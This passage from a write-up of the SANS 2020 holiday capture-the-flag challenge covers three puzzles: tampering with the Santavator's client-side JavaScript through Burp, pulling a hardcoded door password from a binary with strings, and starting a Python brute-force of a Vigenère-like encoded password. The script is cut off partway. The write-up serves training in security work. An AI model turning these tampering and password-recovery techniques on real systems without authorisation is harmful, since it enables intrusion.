  &lt;span class="nx"&gt;btnr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;add&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;remove&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;powered&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="nx"&gt;btn4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;add&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;remove&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;powered&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The JavaScript computes how much colored particles are redirected to their
correct nozzle. It computes a &lt;code&gt;fillLevel&lt;/code&gt;, which determines if the
nozzle is fully filled (i.e. the &lt;code&gt;fillLevel&lt;/code&gt; variable is equal to 1).
If that's the case, the &lt;code&gt;powered[index]&lt;/code&gt; variable is set to true.
&lt;code&gt;powered[2]&lt;/code&gt; is the green light, &lt;code&gt;powered[1]&lt;/code&gt; is the yellow light,
and &lt;code&gt;powered[0]&lt;/code&gt; is the red light.&lt;/p&gt;
&lt;p&gt;We can see that the different buttons are considered powered only if the
corresponding lights are powered. For the button &lt;code&gt;btn2&lt;/code&gt;, we also need
the workshop button. And for the button &lt;code&gt;btn4&lt;/code&gt;, we saw that we need the
&lt;code&gt;besanta&lt;/code&gt; token.&lt;/p&gt;
&lt;p&gt;Since every thing is done client-side, we can modify the JavaScript so that
everything is always powered on. However, since the &lt;code&gt;fillLEvel&lt;/code&gt; variable
is a &lt;code&gt;const&lt;/code&gt;, we cannot modify it during runtime. So let's use Burp to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Modify our &lt;code&gt;app.js&lt;/code&gt; file when the browser requests it.&lt;/li&gt;
&lt;li&gt;Modify our available tokens, so that we have &lt;code&gt;workshop-button&lt;/code&gt; and
&lt;code&gt;besanta&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;img alt="santavator_burp_match_replace.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_burp_match_replace.png" /&gt;
&lt;p&gt;Now, we can use the Santavator to go to any floor:&lt;/p&gt;
&lt;img alt="santavator_hack.gif" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_hack.gif" /&gt;
&lt;p&gt;There are many ways we can modify the &lt;code&gt;app.js&lt;/code&gt; file to hijack the
Santavator. For example, the floor we go to is determined by the HTML attribute
&lt;code&gt;data-floor&lt;/code&gt; set on each button:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;handleBtn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;event&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;targetFloor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;currentTarget&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;attributes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data-floor&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;  &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ajax&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;POST_URL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;dataType&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;contentType&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;application/json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="nx"&gt;targetFloor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;getParams&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;}),&lt;/span&gt;
    &lt;span class="nx"&gt;success&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;__POST_RESULTS__&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
          &lt;span class="nx"&gt;resourceId&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;getParams&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;1111&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
          &lt;span class="nx"&gt;hash&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="hll"&gt;          &lt;span class="nx"&gt;action&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="sb"&gt;`goToFloor-&lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;targetFloor&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;        &lt;span class="p"&gt;});&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;localstorage-error&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;strong&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Heads up:&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;strong&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; Your Santavator repair configuration cannot be accessed or saved in incognito mode.&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;img&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;f15btn found&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;images/floor1-5button.png&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;key&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;print-cover&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;btn btn1 active powered&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;data-floor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;1&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;btn btn15 powered&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;data-floor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;1.5&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;1.5&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;`
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;btn btn2 powered&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;data-floor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;2&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;btn btn3 powered&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;data-floor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;3&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;btn btnr powered&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;data-floor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;r&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;R&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;button&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Therefore we can, for example, light up the green nozzle, and then modify the
button &lt;code&gt;btn1&lt;/code&gt;, so that its &lt;code&gt;data-floor&lt;/code&gt; attribute points to the
floor we want to go to.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-5"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id15"&gt;Objective 5:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="bushy-evergreen-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id16"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="opening-the-door"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id17"&gt;Opening the door&lt;/a&gt;&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Help us get into the Speaker Unpreparedness Room!&lt;/span&gt;

&lt;span class="go"&gt;The door is controlled by ./door, but it needs a password! If you can figure&lt;/span&gt;
&lt;span class="go"&gt;out the password, it&amp;#39;ll open the door right up!&lt;/span&gt;

&lt;span class="go"&gt;Oh, and if you have extra time, maybe you can turn on the lights with ./lights&lt;/span&gt;
&lt;span class="go"&gt;activate the vending machines with ./vending-machines? Those are a little&lt;/span&gt;
&lt;span class="go"&gt;trickier, they have configuration files, but it&amp;#39;d help us a lot!&lt;/span&gt;

&lt;span class="go"&gt;(You can do one now and come back to do the others later if you want)&lt;/span&gt;

&lt;span class="go"&gt;We copied edit-able versions of everything into the ./lab/ folder, in case you&lt;/span&gt;
&lt;span class="go"&gt;want to try EDITING or REMOVING the configuration files to see how the binaries&lt;/span&gt;
&lt;span class="go"&gt;react.&lt;/span&gt;

&lt;span class="go"&gt;Note: These don&amp;#39;t require low-level reverse engineering, so you can put away IDA&lt;/span&gt;
&lt;span class="go"&gt;and Ghidra (unless you WANT to use them!)&lt;/span&gt;
&lt;span class="gp"&gt;elf@29c6cc0288b7 ~ $&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's launch the &lt;code&gt;./door&lt;/code&gt; executable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@f0c0e42e2e48 ~ $&lt;/span&gt; ./door
&lt;span class="go"&gt;You look at the screen. It wants a password. You roll your eyes - the&lt;/span&gt;
&lt;span class="go"&gt;password is probably stored right in the binary. There&amp;#39;s gotta be a&lt;/span&gt;
&lt;span class="go"&gt;tool for this...&lt;/span&gt;

&lt;span class="go"&gt;What do you enter? &amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&amp;quot;The password is probably stored right in the binary&amp;quot;. Hmm, maybe we can find
it using &lt;code&gt;strings&lt;/code&gt;?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@f0c0e42e2e48 ~ $&lt;/span&gt; strings ./door &lt;span class="p"&gt;|&lt;/span&gt; grep -i password
&lt;span class="go"&gt;/home/elf/doorYou look at the screen. It wants a password. You roll your eyes - the&lt;/span&gt;
&lt;span class="go"&gt;password is probably stored right in the binary. There&amp;#39;s gotta be a&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Be sure to finish the challenge in prod: And don&amp;#39;t forget, the password is &amp;quot;Op3nTheD00r&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Beep boop invalid password&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's try &lt;code&gt;Op3nTheD00r&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@f0c0e42e2e48 ~ $&lt;/span&gt; ./door
&lt;span class="go"&gt;You look at the screen. It wants a password. You roll your eyes - the&lt;/span&gt;
&lt;span class="go"&gt;password is probably stored right in the binary. There&amp;#39;s gotta be a&lt;/span&gt;
&lt;span class="go"&gt;tool for this...&lt;/span&gt;

&lt;span class="go"&gt;What do you enter? &amp;gt; Op3nTheD00r&lt;/span&gt;
&lt;span class="go"&gt;Checking......&lt;/span&gt;

&lt;span class="go"&gt;Door opened!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray, it worked!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="repairing-the-vending-machines"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id18"&gt;Repairing the vending machines&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;vending-machines&lt;/code&gt; executable reads a JSON configuration file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~ $&lt;/span&gt; ./vending-machines
&lt;span class="go"&gt;The elves are hungry!&lt;/span&gt;

&lt;span class="go"&gt;If the door&amp;#39;s still closed or the lights are still off, you know because&lt;/span&gt;
&lt;span class="go"&gt;you can hear them complaining about the turned-off vending machines!&lt;/span&gt;
&lt;span class="go"&gt;You can probably make some friends if you can get them back on...&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Loading configuration from: /home/elf/vending-machines.json&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~ $&lt;/span&gt; cat vending-machines.json
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;name&amp;quot;: &amp;quot;elf-maintenance&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;LVEdQPpBwr&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I first tried submitting the password as is, but got an error.&lt;/p&gt;
&lt;p&gt;We're told to take a look in the &lt;code&gt;./lab/&lt;/code&gt; folder, to get test
configuration files, and see the behaviour of the executables when their
configuration files are modified or missing. Let's delete &lt;code&gt;vending-machines.json&lt;/code&gt;
and see what happens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~/lab $&lt;/span&gt; ./vending-machines
&lt;span class="go"&gt;The elves are hungry!&lt;/span&gt;

&lt;span class="go"&gt;If the door&amp;#39;s still closed or the lights are still off, you know because&lt;/span&gt;
&lt;span class="go"&gt;you can hear them complaining about the turned-off vending machines!&lt;/span&gt;
&lt;span class="go"&gt;You can probably make some friends if you can get them back on...&lt;/span&gt;

&lt;span class="go"&gt;Loading configuration from: /home/elf/lab/vending-machines.json&lt;/span&gt;

&lt;span class="go"&gt;I wonder what would happen if it couldn&amp;#39;t find its config file? Maybe that&amp;#39;s&lt;/span&gt;
&lt;span class="go"&gt;something you could figure out in the lab...&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;ALERT! ALERT! Configuration file is missing! New Configuration File Creator Activated!&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Please enter the name &amp;gt; elf-maintenance&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;Please enter the password &amp;gt; toor&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If the configuration file is missing, a new one is generated, with our input
for &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;password&lt;/code&gt;. Let's see the generated configuration
file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~/lab $&lt;/span&gt; cat ./vending-machines.json
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;name&amp;quot;: &amp;quot;elf-maintenance&amp;quot;,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;cjfy&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that our &lt;code&gt;toor&lt;/code&gt; password was encoded. Several things:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The length of the encoded password is the same as the plaintext password.&lt;/li&gt;
&lt;li&gt;The encoding of a letter seems to depend on its position in the string. For
example, the first and second &lt;code&gt;o&lt;/code&gt; in &lt;code&gt;toor&lt;/code&gt; were respectively
encoded &lt;code&gt;j&lt;/code&gt; and &lt;code&gt;f&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Is a letter encoding value dependent only on its position in the string? Let's
try something, like creating a configuration file with a value of &lt;code&gt;taar&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~/lab $&lt;/span&gt; cat vending-machines.json
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;name&amp;quot;: &amp;quot;elf-maintenance&amp;quot;,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  &amp;quot;password&amp;quot;: &amp;quot;cVby&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our &lt;code&gt;t&lt;/code&gt; is still encoded as &lt;code&gt;c&lt;/code&gt;, and our &lt;code&gt;r&lt;/code&gt; as &lt;code&gt;y&lt;/code&gt;.
Each letter's encoding value seems to depend only on its position in the
string.  So, there seems to some kind of &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher"&gt;Vigenère cipher&lt;/a&gt;
going on.&lt;/p&gt;
&lt;p&gt;Here's something we can try:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;We generate a password of one character.&lt;/li&gt;
&lt;li&gt;We encode our password, and read the configuration file.&lt;ul&gt;
&lt;li&gt;If it matches the first character of our real password (in our case
&lt;code&gt;L&lt;/code&gt;), we know the first plain character.&lt;/li&gt;
&lt;li&gt;Otherwise, we try another character.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Once we have the first character, we move on to the second one, and so on.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here's a Python code to perform this task:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;string&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;os&lt;/span&gt;

&lt;span class="n"&gt;ENC_PASSWORD&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;LVEdQPpBwr&amp;#39;&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;plain_password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;charset&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;printable&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ENC_PASSWORD&lt;/span&gt;&lt;span class="p"&gt;)):&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;charset&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;remove&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;vending-machines.json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;FileNotFoundError&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;pass&lt;/span&gt;
